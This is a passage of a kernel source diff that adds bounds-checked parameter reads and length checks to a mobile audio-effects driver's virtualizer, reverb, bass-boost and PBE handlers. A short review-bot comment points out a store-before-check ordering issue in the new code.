- AUDPROC_PARAM_ID_VIRTUALIZER_STRENGTH; -- *updt_params++ = VIRTUALIZER_STRENGTH_PARAM_SZ; -- *updt_params++ = virtualizer->strength; -- params_length += COMMAND_PAYLOAD_SZ + -+ *updt_params++ = - VIRTUALIZER_STRENGTH_PARAM_SZ; -+ *updt_params++ = -+ virtualizer->strength; - } - break; - case VIRTUALIZER_OUT_TYPE: -@@ -180,17 +221,26 @@ int msm_audio_effects_virtualizer_handler(struct audio_client *ac, - rc = -EINVAL; - goto invalid_config; - } -- virtualizer->out_type = *values++; 
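Review bot: In the VIRTUALIZER_ENABLE case the result of GET_NEXT is stored into `virtualizer->enable_flag` before `rc` is examined, so a failed read leaves -EINVAL in the effect state. The later `if (rc != 0) break;` only skips the write to `updt_params` and leaves the `switch`, not the function, which continues outside this hunk. Reading into a local first avoids that: `int val = GET_NEXT(values, param_max_offset, rc);`, then `if (rc != 0) goto invalid_config;`, then `virtualizer->enable_flag = val;`. The same store-then-check order is used for every parameter in the STRENGTH, OUT_TYPE and GAIN_ADJUST cases and in the other handlers' case hunks.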
-+ virtualizer->out_type = -+ GET_NEXT(values, param_max_offset, rc); - pr_debug("%s: VIRT OUT_TYPE val:%d\n", - __func__, virtualizer->out_type); - if (command_config_state == CONFIG_SET) { -- *updt_params++ = AUDPROC_MODULE_ID_VIRTUALIZER; -+ params_length += COMMAND_PAYLOAD_SZ + -+ VIRTUALIZER_OUT_TYPE_PARAM_SZ; -+ CHECK_PARAM_LEN(params_length, -+ MAX_INBAND_PARAM_SZ, -+ "VIRT OUT_TYPE", rc); -+ if (rc != 0) -+ break; -+ *updt_params++ = -+ AUDPROC_MODULE_ID_VIRTUALIZER; - *updt_params++ = - AUDPROC_PARAM_ID_VIRTUALIZER_OUT_TYPE; -- *updt_params++ = VIRTUALIZER_OUT_TYPE_PARAM_SZ; -- *updt_params++ = virtualizer->out_type; -- params_length += COMMAND_PAYLOAD_SZ + -+ *updt_params++ = - VIRTUALIZER_OUT_TYPE_PARAM_SZ; -+ *updt_params++ = -+ virtualizer->out_type; - } - break; - case VIRTUALIZER_GAIN_ADJUST: -@@ -199,18 +249,26 @@ int msm_audio_effects_virtualizer_handler(struct audio_client *ac, - rc = -EINVAL; - goto invalid_config; - } -- virtualizer->gain_adjust = *values++; -+ virtualizer->gain_adjust = -+ GET_NEXT(values, param_max_offset, rc); - pr_debug("%s: VIRT GAIN_ADJUST val:%d\n", - __func__, virtualizer->gain_adjust); - if (command_config_state == CONFIG_SET) { -- *updt_params++ = AUDPROC_MODULE_ID_VIRTUALIZER; -- *updt_params++ = -- AUDPROC_PARAM_ID_VIRTUALIZER_GAIN_ADJUST; -- *updt_params++ = -- VIRTUALIZER_GAIN_ADJUST_PARAM_SZ; -- *updt_params++ = virtualizer->gain_adjust; - params_length += COMMAND_PAYLOAD_SZ + - VIRTUALIZER_GAIN_ADJUST_PARAM_SZ; -+ CHECK_PARAM_LEN(params_length, -+ MAX_INBAND_PARAM_SZ, -+ "VIRT GAIN_ADJUST", rc); -+ if (rc != 0) -+ break; -+ *updt_params++ = -+ AUDPROC_MODULE_ID_VIRTUALIZER; -+ *updt_params++ = -+ AUDPROC_PARAM_ID_VIRTUALIZER_GAIN_ADJUST; -+ *updt_params++ = -+ VIRTUALIZER_GAIN_ADJUST_PARAM_SZ; -+ *updt_params++ = -+ virtualizer->gain_adjust; - } - break; - default: -@@ -218,7 +276,7 @@ int msm_audio_effects_virtualizer_handler(struct audio_client *ac, - break; - } - } -- if (params_length && 
!msm_dts_eagle_is_hpx_on()) -+ if (params_length && !msm_dts_eagle_is_hpx_on() && (rc == 0)) - q6asm_send_audio_effects_params(ac, params, - params_length); - else -@@ -232,15 +290,16 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac, - struct reverb_params *reverb, - long *values) - { -- int devices = *values++; -- int num_commands = *values++; -- char *params; -+ long *param_max_offset = values + MAX_PP_PARAMS_SZ - 1; -+ char *params = NULL; -+ int rc = 0; -+ int devices = GET_NEXT(values, param_max_offset, rc); -+ int num_commands = GET_NEXT(values, param_max_offset, rc); - int *updt_params, i, prev_enable_flag; - uint32_t params_length = (MAX_INBAND_PARAM_SZ); -- int rc = 0; - - pr_debug("%s\n", __func__); -- if (!ac) { -+ if (!ac || (devices == -EINVAL) || (num_commands == -EINVAL)) { - pr_err("%s: cannot set audio effects\n", __func__); - return -EINVAL; - } -@@ -253,10 +312,14 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac, - updt_params = (int *)params; - params_length = 0; - for (i = 0; i < num_commands; i++) { -- uint32_t command_id = *values++; -- uint32_t command_config_state = *values++; -- uint32_t index_offset = *values++; -- uint32_t length = *values++; -+ uint32_t command_id = -+ GET_NEXT(values, param_max_offset, rc); -+ uint32_t command_config_state = -+ GET_NEXT(values, param_max_offset, rc); -+ uint32_t index_offset = -+ GET_NEXT(values, param_max_offset, rc); -+ uint32_t length = -+ GET_NEXT(values, param_max_offset, rc); - switch (command_id) { - case REVERB_ENABLE: - if (length != 1 || index_offset != 0) { -@@ -265,16 +328,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac, - goto invalid_config; - } - prev_enable_flag = reverb->enable_flag; -- reverb->enable_flag = *values++; -+ reverb->enable_flag = -+ GET_NEXT(values, param_max_offset, rc); - pr_debug("%s:REVERB_ENABLE prev:%d,new:%d\n", __func__, - prev_enable_flag, reverb->enable_flag); - if (prev_enable_flag != reverb->enable_flag) { -- 
*updt_params++ = AUDPROC_MODULE_ID_REVERB; -- *updt_params++ = AUDPROC_PARAM_ID_REVERB_ENABLE; -- *updt_params++ = REVERB_ENABLE_PARAM_SZ; -- *updt_params++ = reverb->enable_flag; - params_length += COMMAND_PAYLOAD_SZ + - REVERB_ENABLE_PARAM_SZ; -+ CHECK_PARAM_LEN(params_length, -+ MAX_INBAND_PARAM_SZ, -+ "REVERB_ENABLE", rc); -+ if (rc != 0) -+ break; -+ *updt_params++ = -+ AUDPROC_MODULE_ID_REVERB; -+ *updt_params++ = -+ AUDPROC_PARAM_ID_REVERB_ENABLE; -+ *updt_params++ = -+ REVERB_ENABLE_PARAM_SZ; -+ *updt_params++ = -+ reverb->enable_flag; - } - break; - case REVERB_MODE: -@@ -283,16 +356,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac, - rc = -EINVAL; - goto invalid_config; - } -- reverb->mode = *values++; -+ reverb->mode = -+ GET_NEXT(values, param_max_offset, rc); - pr_debug("%s: REVERB_MODE val:%d\n", - __func__, reverb->mode); - if (command_config_state == CONFIG_SET) { -- *updt_params++ = AUDPROC_MODULE_ID_REVERB; -- *updt_params++ = AUDPROC_PARAM_ID_REVERB_MODE; -- *updt_params++ = REVERB_MODE_PARAM_SZ; -- *updt_params++ = reverb->mode; - params_length += COMMAND_PAYLOAD_SZ + - REVERB_MODE_PARAM_SZ; -+ CHECK_PARAM_LEN(params_length, -+ MAX_INBAND_PARAM_SZ, -+ "REVERB_MODE", rc); -+ if (rc != 0) -+ break; -+ *updt_params++ = -+ AUDPROC_MODULE_ID_REVERB; -+ *updt_params++ = -+ AUDPROC_PARAM_ID_REVERB_MODE; -+ *updt_params++ = -+ REVERB_MODE_PARAM_SZ; -+ *updt_params++ = -+ reverb->mode; - } - break; - case REVERB_PRESET: -@@ -301,16 +384,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac, - rc = -EINVAL; - goto invalid_config; - } -- reverb->preset = *values++; -+ reverb->preset = -+ GET_NEXT(values, param_max_offset, rc); - pr_debug("%s: REVERB_PRESET val:%d\n", - __func__, reverb->preset); - if (command_config_state == CONFIG_SET) { -- *updt_params++ = AUDPROC_MODULE_ID_REVERB; -- *updt_params++ = AUDPROC_PARAM_ID_REVERB_PRESET; -- *updt_params++ = REVERB_PRESET_PARAM_SZ; -- *updt_params++ = reverb->preset; - 
params_length += COMMAND_PAYLOAD_SZ + - REVERB_PRESET_PARAM_SZ; -+ CHECK_PARAM_LEN(params_length, -+ MAX_INBAND_PARAM_SZ, -+ "REVERB_PRESET", rc); -+ if (rc != 0) -+ break; -+ *updt_params++ = -+ AUDPROC_MODULE_ID_REVERB; -+ *updt_params++ = -+ AUDPROC_PARAM_ID_REVERB_PRESET; -+ *updt_params++ = -+ REVERB_PRESET_PARAM_SZ; -+ *updt_params++ = -+ reverb->preset; - } - break; - case REVERB_WET_MIX: -@@ -319,17 +412,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac, - rc = -EINVAL; - goto invalid_config; - } -- reverb->wet_mix = *values++; -+ reverb->wet_mix = -+ GET_NEXT(values, param_max_offset, rc); - pr_debug("%s: REVERB_WET_MIX val:%d\n", - __func__, reverb->wet_mix); - if (command_config_state == CONFIG_SET) { -- *updt_params++ = AUDPROC_MODULE_ID_REVERB; -+ params_length += COMMAND_PAYLOAD_SZ + -+ REVERB_WET_MIX_PARAM_SZ; -+ CHECK_PARAM_LEN(params_length, -+ MAX_INBAND_PARAM_SZ, -+ "REVERB_WET_MIX", rc); -+ if (rc != 0) -+ break; -+ *updt_params++ = -+ AUDPROC_MODULE_ID_REVERB; - *updt_params++ = - AUDPROC_PARAM_ID_REVERB_WET_MIX; -- *updt_params++ = REVERB_WET_MIX_PARAM_SZ; -- *updt_params++ = reverb->wet_mix; -- params_length += COMMAND_PAYLOAD_SZ + -+ *updt_params++ = - REVERB_WET_MIX_PARAM_SZ; -+ *updt_params++ = -+ reverb->wet_mix; - } - break; - case REVERB_GAIN_ADJUST: -@@ -338,17 +440,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac, - rc = -EINVAL; - goto invalid_config; - } -- reverb->gain_adjust = *values++; -+ reverb->gain_adjust = -+ GET_NEXT(values, param_max_offset, rc); - pr_debug("%s: REVERB_GAIN_ADJUST val:%d\n", - __func__, reverb->gain_adjust); - if (command_config_state == CONFIG_SET) { -- *updt_params++ = AUDPROC_MODULE_ID_REVERB; -+ params_length += COMMAND_PAYLOAD_SZ + -+ REVERB_GAIN_ADJUST_PARAM_SZ; -+ CHECK_PARAM_LEN(params_length, -+ MAX_INBAND_PARAM_SZ, -+ "REVERB_GAIN_ADJUST", rc); -+ if (rc != 0) -+ break; -+ *updt_params++ = -+ AUDPROC_MODULE_ID_REVERB; - *updt_params++ = - 
AUDPROC_PARAM_ID_REVERB_GAIN_ADJUST; -- *updt_params++ = REVERB_GAIN_ADJUST_PARAM_SZ; -- *updt_params++ = reverb->gain_adjust; -- params_length += COMMAND_PAYLOAD_SZ + -+ *updt_params++ = - REVERB_GAIN_ADJUST_PARAM_SZ; -+ *updt_params++ = -+ reverb->gain_adjust; - } - break; - case REVERB_ROOM_LEVEL: -@@ -357,17 +468,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac, - rc = -EINVAL; - goto invalid_config; - } -- reverb->room_level = *values++; -+ reverb->room_level = -+ GET_NEXT(values, param_max_offset, rc); - pr_debug("%s: REVERB_ROOM_LEVEL val:%d\n", - __func__, reverb->room_level); - if (command_config_state == CONFIG_SET) { -- *updt_params++ = AUDPROC_MODULE_ID_REVERB; -+ params_length += COMMAND_PAYLOAD_SZ + -+ REVERB_ROOM_LEVEL_PARAM_SZ; -+ CHECK_PARAM_LEN(params_length, -+ MAX_INBAND_PARAM_SZ, -+ "REVERB_ROOM_LEVEL", rc); -+ if (rc != 0) -+ break; -+ *updt_params++ = -+ AUDPROC_MODULE_ID_REVERB; - *updt_params++ = - AUDPROC_PARAM_ID_REVERB_ROOM_LEVEL; -- *updt_params++ = REVERB_ROOM_LEVEL_PARAM_SZ; -- *updt_params++ = reverb->room_level; -- params_length += COMMAND_PAYLOAD_SZ + -+ *updt_params++ = - REVERB_ROOM_LEVEL_PARAM_SZ; -+ *updt_params++ = -+ reverb->room_level; - } - break; - case REVERB_ROOM_HF_LEVEL: -@@ -376,17 +496,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac, - rc = -EINVAL; - goto invalid_config; - } -- reverb->room_hf_level = *values++; -+ reverb->room_hf_level = -+ GET_NEXT(values, param_max_offset, rc); - pr_debug("%s: REVERB_ROOM_HF_LEVEL val%d\n", - __func__, reverb->room_hf_level); - if (command_config_state == CONFIG_SET) { -- *updt_params++ = AUDPROC_MODULE_ID_REVERB; -+ params_length += COMMAND_PAYLOAD_SZ + -+ REVERB_ROOM_HF_LEVEL_PARAM_SZ; -+ CHECK_PARAM_LEN(params_length, -+ MAX_INBAND_PARAM_SZ, -+ "REVERB_ROOM_HF_LEVEL", rc); -+ if (rc != 0) -+ break; -+ *updt_params++ = -+ AUDPROC_MODULE_ID_REVERB; - *updt_params++ = - AUDPROC_PARAM_ID_REVERB_ROOM_HF_LEVEL; -- *updt_params++ = 
REVERB_ROOM_HF_LEVEL_PARAM_SZ; -- *updt_params++ = reverb->room_hf_level; -- params_length += COMMAND_PAYLOAD_SZ + -+ *updt_params++ = - REVERB_ROOM_HF_LEVEL_PARAM_SZ; -+ *updt_params++ = -+ reverb->room_hf_level; - } - break; - case REVERB_DECAY_TIME: -@@ -395,17 +524,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac, - rc = -EINVAL; - goto invalid_config; - } -- reverb->decay_time = *values++; -+ reverb->decay_time = -+ GET_NEXT(values, param_max_offset, rc); - pr_debug("%s: REVERB_DECAY_TIME val:%d\n", - __func__, reverb->decay_time); - if (command_config_state == CONFIG_SET) { -- *updt_params++ = AUDPROC_MODULE_ID_REVERB; -+ params_length += COMMAND_PAYLOAD_SZ + -+ REVERB_DECAY_TIME_PARAM_SZ; -+ CHECK_PARAM_LEN(params_length, -+ MAX_INBAND_PARAM_SZ, -+ "REVERB_DECAY_TIME", rc); -+ if (rc != 0) -+ break; -+ *updt_params++ = -+ AUDPROC_MODULE_ID_REVERB; - *updt_params++ = - AUDPROC_PARAM_ID_REVERB_DECAY_TIME; -- *updt_params++ = REVERB_DECAY_TIME_PARAM_SZ; -- *updt_params++ = reverb->decay_time; -- params_length += COMMAND_PAYLOAD_SZ + -+ *updt_params++ = - REVERB_DECAY_TIME_PARAM_SZ; -+ *updt_params++ = -+ reverb->decay_time; - } - break; - case REVERB_DECAY_HF_RATIO: -@@ -414,17 +552,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac, - rc = -EINVAL; - goto invalid_config; - } -- reverb->decay_hf_ratio = *values++; -+ reverb->decay_hf_ratio = -+ GET_NEXT(values, param_max_offset, rc); - pr_debug("%s: REVERB_DECAY_HF_RATIO val%d\n", - __func__, reverb->decay_hf_ratio); - if (command_config_state == CONFIG_SET) { -- *updt_params++ = AUDPROC_MODULE_ID_REVERB; -+ params_length += COMMAND_PAYLOAD_SZ + -+ REVERB_DECAY_HF_RATIO_PARAM_SZ; -+ CHECK_PARAM_LEN(params_length, -+ MAX_INBAND_PARAM_SZ, -+ "REVERB_DECAY_HF_RATIO", rc); -+ if (rc != 0) -+ break; -+ *updt_params++ = -+ AUDPROC_MODULE_ID_REVERB; - *updt_params++ = - AUDPROC_PARAM_ID_REVERB_DECAY_HF_RATIO; -- *updt_params++ = REVERB_DECAY_HF_RATIO_PARAM_SZ; -- *updt_params++ = 
reverb->decay_hf_ratio; -- params_length += COMMAND_PAYLOAD_SZ + -+ *updt_params++ = - REVERB_DECAY_HF_RATIO_PARAM_SZ; -+ *updt_params++ = -+ reverb->decay_hf_ratio; - } - break; - case REVERB_REFLECTIONS_LEVEL: -@@ -433,18 +580,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac, - rc = -EINVAL; - goto invalid_config; - } -- reverb->reflections_level = *values++; -+ reverb->reflections_level = -+ GET_NEXT(values, param_max_offset, rc); - pr_debug("%s: REVERB_REFLECTIONS_LEVEL val:%d\n", - __func__, reverb->reflections_level); - if (command_config_state == CONFIG_SET) { -- *updt_params++ = AUDPROC_MODULE_ID_REVERB; -- *updt_params++ = -- AUDPROC_PARAM_ID_REVERB_REFLECTIONS_LEVEL; -- *updt_params++ = -- REVERB_REFLECTIONS_LEVEL_PARAM_SZ; -- *updt_params++ = reverb->reflections_level; - params_length += COMMAND_PAYLOAD_SZ + - REVERB_REFLECTIONS_LEVEL_PARAM_SZ; -+ CHECK_PARAM_LEN(params_length, -+ MAX_INBAND_PARAM_SZ, -+ "REVERB_REFLECTIONS_LEVEL", rc); -+ if (rc != 0) -+ break; -+ *updt_params++ = -+ AUDPROC_MODULE_ID_REVERB; -+ *updt_params++ = -+ AUDPROC_PARAM_ID_REVERB_REFLECTIONS_LEVEL; -+ *updt_params++ = -+ REVERB_REFLECTIONS_LEVEL_PARAM_SZ; -+ *updt_params++ = -+ reverb->reflections_level; - } - break; - case REVERB_REFLECTIONS_DELAY: -@@ -453,18 +608,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac, - rc = -EINVAL; - goto invalid_config; - } -- reverb->reflections_delay = *values++; -+ reverb->reflections_delay = -+ GET_NEXT(values, param_max_offset, rc); - pr_debug("%s: REVERB_REFLECTIONS_DELAY val:%d\n", - __func__, reverb->reflections_delay); - if (command_config_state == CONFIG_SET) { -- *updt_params++ = AUDPROC_MODULE_ID_REVERB; -- *updt_params++ = -- AUDPROC_PARAM_ID_REVERB_REFLECTIONS_DELAY; -- *updt_params++ = -- REVERB_REFLECTIONS_DELAY_PARAM_SZ; -- *updt_params++ = reverb->reflections_delay; - params_length += COMMAND_PAYLOAD_SZ + - REVERB_REFLECTIONS_DELAY_PARAM_SZ; -+ CHECK_PARAM_LEN(params_length, -+ 
MAX_INBAND_PARAM_SZ, -+ "REVERB_REFLECTIONS_DELAY", rc); -+ if (rc != 0) -+ break; -+ *updt_params++ = -+ AUDPROC_MODULE_ID_REVERB; -+ *updt_params++ = -+ AUDPROC_PARAM_ID_REVERB_REFLECTIONS_DELAY; -+ *updt_params++ = -+ REVERB_REFLECTIONS_DELAY_PARAM_SZ; -+ *updt_params++ = -+ reverb->reflections_delay; - } - break; - case REVERB_LEVEL: -@@ -473,16 +636,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac, - rc = -EINVAL; - goto invalid_config; - } -- reverb->level = *values++; -+ reverb->level = -+ GET_NEXT(values, param_max_offset, rc); - pr_debug("%s: REVERB_LEVEL val:%d\n", - __func__, reverb->level); - if (command_config_state == CONFIG_SET) { -- *updt_params++ = AUDPROC_MODULE_ID_REVERB; -- *updt_params++ = AUDPROC_PARAM_ID_REVERB_LEVEL; -- *updt_params++ = REVERB_LEVEL_PARAM_SZ; -- *updt_params++ = reverb->level; - params_length += COMMAND_PAYLOAD_SZ + - REVERB_LEVEL_PARAM_SZ; -+ CHECK_PARAM_LEN(params_length, -+ MAX_INBAND_PARAM_SZ, -+ "REVERB_LEVEL", rc); -+ if (rc != 0) -+ break; -+ *updt_params++ = -+ AUDPROC_MODULE_ID_REVERB; -+ *updt_params++ = -+ AUDPROC_PARAM_ID_REVERB_LEVEL; -+ *updt_params++ = -+ REVERB_LEVEL_PARAM_SZ; -+ *updt_params++ = -+ reverb->level; - } - break; - case REVERB_DELAY: -@@ -491,16 +664,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac, - rc = -EINVAL; - goto invalid_config; - } -- reverb->delay = *values++; -+ reverb->delay = -+ GET_NEXT(values, param_max_offset, rc); - pr_debug("%s:REVERB_DELAY val:%d\n", - __func__, reverb->delay); - if (command_config_state == CONFIG_SET) { -- *updt_params++ = AUDPROC_MODULE_ID_REVERB; -- *updt_params++ = AUDPROC_PARAM_ID_REVERB_DELAY; -- *updt_params++ = REVERB_DELAY_PARAM_SZ; -- *updt_params++ = reverb->delay; - params_length += COMMAND_PAYLOAD_SZ + - REVERB_DELAY_PARAM_SZ; -+ CHECK_PARAM_LEN(params_length, -+ MAX_INBAND_PARAM_SZ, -+ "REVERB_DELAY", rc); -+ if (rc != 0) -+ break; -+ *updt_params++ = -+ AUDPROC_MODULE_ID_REVERB; -+ *updt_params++ = -+ 
AUDPROC_PARAM_ID_REVERB_DELAY; -+ *updt_params++ = -+ REVERB_DELAY_PARAM_SZ; -+ *updt_params++ = -+ reverb->delay; - } - break; - case REVERB_DIFFUSION: -@@ -509,17 +692,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac, - rc = -EINVAL; - goto invalid_config; - } -- reverb->diffusion = *values++; -+ reverb->diffusion = -+ GET_NEXT(values, param_max_offset, rc); - pr_debug("%s: REVERB_DIFFUSION val:%d\n", - __func__, reverb->diffusion); - if (command_config_state == CONFIG_SET) { -- *updt_params++ = AUDPROC_MODULE_ID_REVERB; -+ params_length += COMMAND_PAYLOAD_SZ + -+ REVERB_DIFFUSION_PARAM_SZ; -+ CHECK_PARAM_LEN(params_length, -+ MAX_INBAND_PARAM_SZ, -+ "REVERB_DIFFUSION", rc); -+ if (rc != 0) -+ break; -+ *updt_params++ = -+ AUDPROC_MODULE_ID_REVERB; - *updt_params++ = - AUDPROC_PARAM_ID_REVERB_DIFFUSION; -- *updt_params++ = REVERB_DIFFUSION_PARAM_SZ; -- *updt_params++ = reverb->diffusion; -- params_length += COMMAND_PAYLOAD_SZ + -+ *updt_params++ = - REVERB_DIFFUSION_PARAM_SZ; -+ *updt_params++ = -+ reverb->diffusion; - } - break; - case REVERB_DENSITY: -@@ -528,17 +720,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac, - rc = -EINVAL; - goto invalid_config; - } -- reverb->density = *values++; -+ reverb->density = -+ GET_NEXT(values, param_max_offset, rc); - pr_debug("%s: REVERB_DENSITY val:%d\n", - __func__, reverb->density); - if (command_config_state == CONFIG_SET) { -- *updt_params++ = AUDPROC_MODULE_ID_REVERB; -+ params_length += COMMAND_PAYLOAD_SZ + -+ REVERB_DENSITY_PARAM_SZ; -+ CHECK_PARAM_LEN(params_length, -+ MAX_INBAND_PARAM_SZ, -+ "REVERB_DENSITY", rc); -+ if (rc != 0) -+ break; -+ *updt_params++ = -+ AUDPROC_MODULE_ID_REVERB; - *updt_params++ = - AUDPROC_PARAM_ID_REVERB_DENSITY; -- *updt_params++ = REVERB_DENSITY_PARAM_SZ; -- *updt_params++ = reverb->density; -- params_length += COMMAND_PAYLOAD_SZ + -+ *updt_params++ = - REVERB_DENSITY_PARAM_SZ; -+ *updt_params++ = -+ reverb->density; - } - break; - default: -@@ 
-546,7 +747,7 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac, - break; - } - } -- if (params_length && !msm_dts_eagle_is_hpx_on()) -+ if (params_length && !msm_dts_eagle_is_hpx_on() && (rc == 0)) - q6asm_send_audio_effects_params(ac, params, - params_length); - else -@@ -560,15 +761,16 @@ int msm_audio_effects_bass_boost_handler(struct audio_client *ac, - struct bass_boost_params *bass_boost, - long *values) - { -- int devices = *values++; -- int num_commands = *values++; -- char *params; -+ long *param_max_offset = values + MAX_PP_PARAMS_SZ - 1; -+ char *params = NULL; -+ int rc = 0; -+ int devices = GET_NEXT(values, param_max_offset, rc); -+ int num_commands = GET_NEXT(values, param_max_offset, rc); - int *updt_params, i, prev_enable_flag; - uint32_t params_length = (MAX_INBAND_PARAM_SZ); -- int rc = 0; - - pr_debug("%s\n", __func__); -- if (!ac) { -+ if (!ac || (devices == -EINVAL) || (num_commands == -EINVAL)) { - pr_err("%s: cannot set audio effects\n", __func__); - return -EINVAL; - } -@@ -581,10 +783,14 @@ int msm_audio_effects_bass_boost_handler(struct audio_client *ac, - updt_params = (int *)params; - params_length = 0; - for (i = 0; i < num_commands; i++) { -- uint32_t command_id = *values++; -- uint32_t command_config_state = *values++; -- uint32_t index_offset = *values++; -- uint32_t length = *values++; -+ uint32_t command_id = -+ GET_NEXT(values, param_max_offset, rc); -+ uint32_t command_config_state = -+ GET_NEXT(values, param_max_offset, rc); -+ uint32_t index_offset = -+ GET_NEXT(values, param_max_offset, rc); -+ uint32_t length = -+ GET_NEXT(values, param_max_offset, rc); - switch (command_id) { - case BASS_BOOST_ENABLE: - if (length != 1 || index_offset != 0) { -@@ -593,18 +799,27 @@ int msm_audio_effects_bass_boost_handler(struct audio_client *ac, - goto invalid_config; - } - prev_enable_flag = bass_boost->enable_flag; -- bass_boost->enable_flag = *values++; -+ bass_boost->enable_flag = -+ GET_NEXT(values, param_max_offset, 
rc); - pr_debug("%s: BASS_BOOST_ENABLE prev:%d new:%d\n", - __func__, prev_enable_flag, - bass_boost->enable_flag); - if (prev_enable_flag != bass_boost->enable_flag) { -- *updt_params++ = AUDPROC_MODULE_ID_BASS_BOOST; -+ params_length += COMMAND_PAYLOAD_SZ + -+ BASS_BOOST_ENABLE_PARAM_SZ; -+ CHECK_PARAM_LEN(params_length, -+ MAX_INBAND_PARAM_SZ, -+ "BASS_BOOST_ENABLE", rc); -+ if (rc != 0) -+ break; -+ *updt_params++ = -+ AUDPROC_MODULE_ID_BASS_BOOST; - *updt_params++ = - AUDPROC_PARAM_ID_BASS_BOOST_ENABLE; -- *updt_params++ = BASS_BOOST_ENABLE_PARAM_SZ; -- *updt_params++ = bass_boost->enable_flag; -- params_length += COMMAND_PAYLOAD_SZ + -+ *updt_params++ = - BASS_BOOST_ENABLE_PARAM_SZ; -+ *updt_params++ = -+ bass_boost->enable_flag; - } - break; - case BASS_BOOST_MODE: -@@ -613,17 +828,26 @@ int msm_audio_effects_bass_boost_handler(struct audio_client *ac, - rc = -EINVAL; - goto invalid_config; - } -- bass_boost->mode = *values++; -+ bass_boost->mode = -+ GET_NEXT(values, param_max_offset, rc); - pr_debug("%s: BASS_BOOST_MODE val:%d\n", - __func__, bass_boost->mode); - if (command_config_state == CONFIG_SET) { -- *updt_params++ = AUDPROC_MODULE_ID_BASS_BOOST; -+ params_length += COMMAND_PAYLOAD_SZ + -+ BASS_BOOST_MODE_PARAM_SZ; -+ CHECK_PARAM_LEN(params_length, -+ MAX_INBAND_PARAM_SZ, -+ "BASS_BOOST_MODE", rc); -+ if (rc != 0) -+ break; -+ *updt_params++ = -+ AUDPROC_MODULE_ID_BASS_BOOST; - *updt_params++ = - AUDPROC_PARAM_ID_BASS_BOOST_MODE; -- *updt_params++ = BASS_BOOST_MODE_PARAM_SZ; -- *updt_params++ = bass_boost->mode; -- params_length += COMMAND_PAYLOAD_SZ + -+ *updt_params++ = - BASS_BOOST_MODE_PARAM_SZ; -+ *updt_params++ = -+ bass_boost->mode; - } - break; - case BASS_BOOST_STRENGTH: -@@ -632,17 +856,26 @@ int msm_audio_effects_bass_boost_handler(struct audio_client *ac, - rc = -EINVAL; - goto invalid_config; - } -- bass_boost->strength = *values++; -- pr_debug("%s: BASS_BOOST_STRENGTHi val:%d\n", -+ bass_boost->strength = -+ GET_NEXT(values, 
param_max_offset, rc); -+ pr_debug("%s: BASS_BOOST_STRENGTH val:%d\n", - __func__, bass_boost->strength); - if (command_config_state == CONFIG_SET) { -- *updt_params++ = AUDPROC_MODULE_ID_BASS_BOOST; -+ params_length += COMMAND_PAYLOAD_SZ + -+ BASS_BOOST_STRENGTH_PARAM_SZ; -+ CHECK_PARAM_LEN(params_length, -+ MAX_INBAND_PARAM_SZ, -+ "BASS_BOOST_STRENGTH", rc); -+ if (rc != 0) -+ break; -+ *updt_params++ = -+ AUDPROC_MODULE_ID_BASS_BOOST; - *updt_params++ = - AUDPROC_PARAM_ID_BASS_BOOST_STRENGTH; -- *updt_params++ = BASS_BOOST_STRENGTH_PARAM_SZ; -- *updt_params++ = bass_boost->strength; -- params_length += COMMAND_PAYLOAD_SZ + -+ *updt_params++ = - BASS_BOOST_STRENGTH_PARAM_SZ; -+ *updt_params++ = -+ bass_boost->strength; - } - break; - default: -@@ -650,7 +883,7 @@ int msm_audio_effects_bass_boost_handler(struct audio_client *ac, - break; - } - } -- if (params_length && !msm_dts_eagle_is_hpx_on()) -+ if (params_length && !msm_dts_eagle_is_hpx_on() && (rc == 0)) - q6asm_send_audio_effects_params(ac, params, - params_length); - else -@@ -664,15 +897,16 @@ int msm_audio_effects_pbe_handler(struct audio_client *ac, - struct pbe_params *pbe, - long *values) - { -- int devices = *values++; -- int num_commands = *values++; -- char *params; -+ long *param_max_offset = values + MAX_PP_PARAMS_SZ - 1; -+ char *params = NULL; -+ int rc = 0; -+ int devices = GET_NEXT(values, param_max_offset, rc); -+ int num_commands = GET_NEXT(values, param_max_offset, rc); - int *updt_params, i, j, prev_enable_flag; - uint32_t params_length = (MAX_INBAND_PARAM_SZ); -- int rc = 0; - - pr_debug("%s\n", __func__); -- if (!ac) { -+ if (!ac || (devices == -EINVAL) || (num_commands == -EINVAL)) { - pr_err("%s: cannot set audio effects\n", __func__); - return -EINVAL; - } -@@ -685,10 +919,14 @@ int msm_audio_effects_pbe_handler(struct audio_client *ac, - updt_params = (int *)params; - params_length = 0; - for (i = 0; i < num_commands; i++) { -- uint32_t command_id = *values++; -- uint32_t 
command_config_state = *values++; -- uint32_t index_offset = *values++; -- uint32_t length = *values++; -+ uint32_t command_id = -+ GET_NEXT(values, param_max_offset, rc); -+ uint32_t command_config_state = -+ GET_NEXT(values, param_max_offset, rc); -+ uint32_t index_offset = -+ GET_NEXT(values, param_max_offset, rc); -+ uint32_t length = -+ GET_NEXT(values, param_max_offset, rc); - switch (command_id) { - case PBE_ENABLE: - pr_debug("%s: PBE_ENABLE\n", __func__); -@@ -698,15 +936,24 @@ int msm_audio_effects_pbe_handler(struct audio_client *ac, - goto invalid_config; - } - prev_enable_flag = pbe->enable_flag; -- pbe->enable_flag = *values++; -+ pbe->enable_flag = -+ GET_NEXT(values, param_max_offset, rc); - if (prev_enable_flag != pbe->enable_flag) { -- *updt_params++ = AUDPROC_MODULE_ID_PBE; -+ params_length += COMMAND_PAYLOAD_SZ + -+ PBE_ENABLE_PARAM_SZ; -+ CHECK_PARAM_LEN(params_length, -+ MAX_INBAND_PARAM_SZ, -+ "PBE_ENABLE", rc); -+ if (rc != 0) -+ break; 